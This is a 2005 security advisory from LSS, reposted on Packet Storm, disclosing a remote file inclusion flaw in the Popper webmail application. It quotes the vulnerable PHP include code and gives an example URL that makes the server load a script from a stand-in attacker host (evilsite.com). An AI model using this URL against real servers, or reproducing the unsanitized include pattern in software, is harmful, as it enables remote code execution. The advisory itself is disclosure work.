what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LSS-2005-06-07.txt

LSS-2005-06-07.txt
Posted Jun 18, 2005
Authored by Leon Juranic | Site security.lss.hr

LSS Security Advisory #LSS-2005-06-07 - Popper webmail is susceptible to a remote code inclusion bug in childwindow.inc.php that allows for remote command execution.

tags | advisory, remote, php
SHA-256 | df5832afc053b6a437f0df4c9905733d31fb35594d529c89550ba0a5fb3cc1c2

LSS-2005-06-07.txt

Change Mirror Download
Hi,

This advisory was already released on https://security.lss.hr, but there was a
mistake in advisory page that marked vulnerable PHP line as HTML tag, so it wasn't
visible within web browser. That's why b0iler described it as a false positive
(https://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034408.html).
I apologize for our mistake, here is fixed advisory.


----------------------------------------------------------------------------------

LSS Security Advisory #LSS-2005-06-07
https://security.lss.hr




Title: Popper webmail remote code execution vulnerability
Advisory ID: LSS-2005-06-07
Date: 2005-06-01
Advisory URL: https://security.lss.hr/index.php?page=details&ID=LSS-2005-06-07
Impact: Remote code execution
Risk Level: High
Vulnerability Type: Remote
Vendors Status: 7th March, 2005



==[ Overview

Popper is a webmail application written in PHP which allows users to read
and send their e-mail messages using a web browser.



==[ Vulnerability

Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script
that can be abused to execute arbitrary code.
Vulnerable code in childwindow.inc.php:
--------
..
<?php
if(file_exists($form.".toolbar.inc.php")) {
include($form.".toolbar.inc.php");
}
?>
..
..
<?php include($form.".form.inc.php");?>
..
--------

To exploit this vulnerability, attacker has to put script like test.form.inc.php
on www.evilsite.com HTTP server, and call url like this:
https://www.vulnsite.com/popper/childwindow.inc.php?form=https://evilsite.com/test
Vulnerability can be exploited only if register_globals in php.ini file is set
to 'on'.



==[ Affected Version

All popper versions including latest 1.41-r2.



==[ Fix

Set register_globals to off.



==[ PoC Exploit

No PoC needed.



==[ Credits

Credits for this vulnerability goes to Leon Juranic <ljuranic@lss.hr>.



==[ LSS Security Contact

LSS Security Team,

WWW : https://security.lss.hr
E-mail : security@LSS.hr
Tel : +385 1 6129 775

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close